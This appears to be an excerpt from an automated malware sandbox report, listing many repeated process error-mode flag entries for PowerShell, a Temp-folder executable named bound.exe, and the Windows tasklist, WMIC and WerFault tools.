                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
